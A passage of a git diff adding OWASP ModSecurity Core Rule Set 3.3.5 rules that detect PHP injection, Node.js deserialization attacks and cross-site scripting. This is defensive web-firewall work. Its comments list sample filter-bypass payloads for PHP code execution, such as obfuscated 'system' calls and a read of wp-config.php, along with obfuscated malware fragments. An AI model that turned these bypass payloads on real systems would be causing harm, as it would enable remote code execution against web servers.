nvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933160,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Object Injection ] +# +# PHP Object Injection is an application level vulnerability that could allow +# an attacker to perform different kinds of malicious attacks, such as +# Code Injection, SQL Injection, Path Traversal and Application Denial of Service, +# depending on the context. +# +# The vulnerability occurs when user-supplied input is not properly sanitized +# before being passed to the unserialize() PHP function. Since PHP allows object +# serialization, attackers could pass ad-hoc serialized strings to a vulnerable +# unserialize() call, resulting in an arbitrary PHP object(s) injection into the +# application scope. +# +# https://www.owasp.org/index.php/PHP_Object_Injection +# +# In serialized form, PHP objects have the following format: +# +# O:8:"stdClass":1:{s:1:"a";i:2;} +# O:3:"Foo":0:{} +# +# Also detected are PHP objects with a custom unserializer: +# http://www.phpinternalsbook.com/classes_objects/serialization.html +# These have the following format: +# +# C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} +# C:3:"Foo":23:{s:15:"My private data";} +# +# HTTP headers are inspected, since PHP object injection vulnerabilities have been +# found in applications parsing them: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header) +# https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header) +# http://karmainsecurity.com/KIS-2015-10 (Host header) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \ + "id:933170,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Serialized Object Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +# +# [ PHP Functions: Variable Function Calls ] +# +# PHP 'variable functions' provide an alternate syntax for calling PHP functions. +# http://php.net/manual/en/functions.variable-functions.php +# +# An attacker may use variable function syntax to evade detection of function +# names during exploitation of a remote code execution vulnerability. +# An example to use the 'file_get_contents' function while evading rule 933150: +# +# $fn = 'file_' . 'get_' . 'contents'; +# echo $fn('wp-co' . 'nfig.php'); +# +# Some examples from obfuscated malware: +# +# $OOO0000O0(...) +# @$b374k(...) +# $_[@-_]($_[@!+_] ) +# +# A breakdown of the regular expression: +# +# \$+ +# The variable's '$' char, or multiple '$' for 'variable variables': +# http://php.net/manual/en/language.variables.variable.php +# (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+}) +# One of the following: +# - A variable name; regexp from http://php.net/language.variables.basics +# - A nonempty expression for variable variables: ${'fn'} or $ {'fn'} +# (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)* +# Optional whitespace, array access, or comments +# \(.*\) +# Parentheses optionally containing function parameters +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933180,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP Functions: Variable Function Prevent Bypass ] +# +# Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ +# the rule 933180 could be bypassed by using the following payloads: +# +# - (system)('uname') +# - (sy.(st).em)('uname') +# - (string)"system"('uname') +# - define('x', 'sys' . 'tem');(x)/* comment */('uname') +# - $y = 'sys'.'tem';($y)('uname') +# - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); +# - (system)(ls) +# - (/**/system)(ls/**/); +# - (['system'])[0]('uname'); +# - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); +# +# This rule blocks all payloads above and avoids to block values like: +# +# - [ACME] this is a test (just a test) +# - Test (with two) rounded (brackets) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \ + "id:933210,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +# +# [ PHP Functions: Medium-Risk PHP Function Names ] +# +# In paranoia level 2, we add additional checks for most PHP functions. +# +# The size of the PHP function list is considerable. +# Even after excluding the more obscure PHP extensions, 1300+ functions remain. +# For performance and maintenance reasons, this rule does not use a regexp, +# but uses a phrase file (@pmFromFile), and additionally looks for an '(' character +# in the matched variable. +# +# This approach carries some risk for false positives. Therefore, the function list +# has been curated to remove words closely matching natural language and terms often +# used in other contexts. +# +# This rule is a stricter sibling of rule 933150. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \ + "id:933151,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS "@pm (" \ + "capture,\ + ctl:auditLogParts=+E,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +# +# [ PHP Variables: Common Variable Indexes ] +# +# In paranoia level 3, we add additional checks for parameters to many PHP variables. +# +# +# One of the more common variables used within attacks on PHP is $_SERVER. Because +# of how many different ways PHP has for executing variables (variable variables, +# etc) often just looking for $_SERVER will be less effective than looking for the +# various indexes within $_SERVER. This rule checks for these indexes. +# This rule is located in PL 3 because often developers will use these names as +# parameter names or values and this will lead to false positives. +# Because this list is not expected to change and it is limited in size we use a +# regex in this case to look for these values whereas in its sibling rule we use +# @pmFromFile for flexibility and performance. +# +# To rebuild the regexp: +# cd util/regexp-assemble +# ./regexp-assemble.pl < regexp-933131.data +# +# This rule is a stricter sibling of rule 933130. +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \ + "id:933131,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: Low-Value PHP Function Calls ] +# +# In paranoia level 3, we add additional checks for the remaining PHP functions. +# +# Most of these function names are likely to cause false positives in natural text +# or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'. +# Therefore, these function names are not scanned in lower paranoia levels. +# +# To mitigate the risk of false positives somewhat, a regexp is used to look for +# PHP function syntax. (See rule 933160 for a description.) +# +# This rule is a stricter sibling of rule 933160. +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble +# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933161,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Script Uploads: Superfluous extension ] +# +# Block file uploads with PHP related extensions (.php, .phps, .phtml, +# .php5 etc) anywhere in the name, followed by a dot. +# +# Example: index.php.tmp +# +# Uploading of such files can lead to remote code execution if +# Apache is configured with AddType and MultiViews, as Apache will +# automatically do a filename match when the extension is unknown. +# This configuration is fortunately not common in modern installs. +# +# Blocking these file names might lead to more false positives. +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +# This rule is a stricter sibling of rule 933110. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ + "id:933111,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Closing Tag Found ] +# +# http://www.php.net/manual/en/language.basic-syntax.phptags.php +# +# This check was extracted from 933100 (paranoia level 1), since the +# checked sequence '?>' commonly causes false positives. +# See issue #654 for discussion. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ + "id:933190,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP Injection Attack: PHP Closing Tag Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf new file mode 100644 index 000000000..89f495a94 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf @@ -0,0 +1,96 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ Insecure unserialization / generic RCE signatures ] +# +# Libraries performing insecure unserialization: +# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) +# - funcster: __js_function +# +# See: +# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ +# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ +# +# Some generic snippets used: +# - function() { +# - new Function( +# - eval( +# - String.fromCharCode( +# +# Last two are used by nodejsshell.py, +# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py +# +# As base64 is sometimes (but not always) used to encode serialized values, +# use multiMatch and t:base64decode. +# +# Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \ + "id:934100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:base64Decode,\ + msg:'Node.js Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-nodejs',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf new file mode 100644 index 000000000..3b2376b9e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -0,0 +1,885 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + + +# +# -=[ Libinjection - XSS Detection ]=- +# +# Ref: https://github.com/client9/libinjection +# Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss +# +# -=[ Targets ]=- +# +# 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/| +# REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent| +# ARGS_NAMES|ARGS|XML:/* +# +# 941101: PL2 : REQUEST_HEADERS:Referer +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ + "id:941100,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Attack Detected via libinjection',\ + logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 1 ]=- +# http://xssplayground.net23.net/xssfilter.html +# script tag based XSS vectors, e.g., +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ + "id:941110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 1: Script Tag Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 2 ]=- +# XSS vectors making use of event handlers like onerror, onload etc, e.g., +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ + "id:941120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 2: Event Handler Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 3 ]=- +# +# Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble. +# To rebuild the regexp: +# cd util/regexp-assemble +# ./regexp-assemble.pl regexp-941130.data +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \ + "id:941130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 3: Attribute Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + 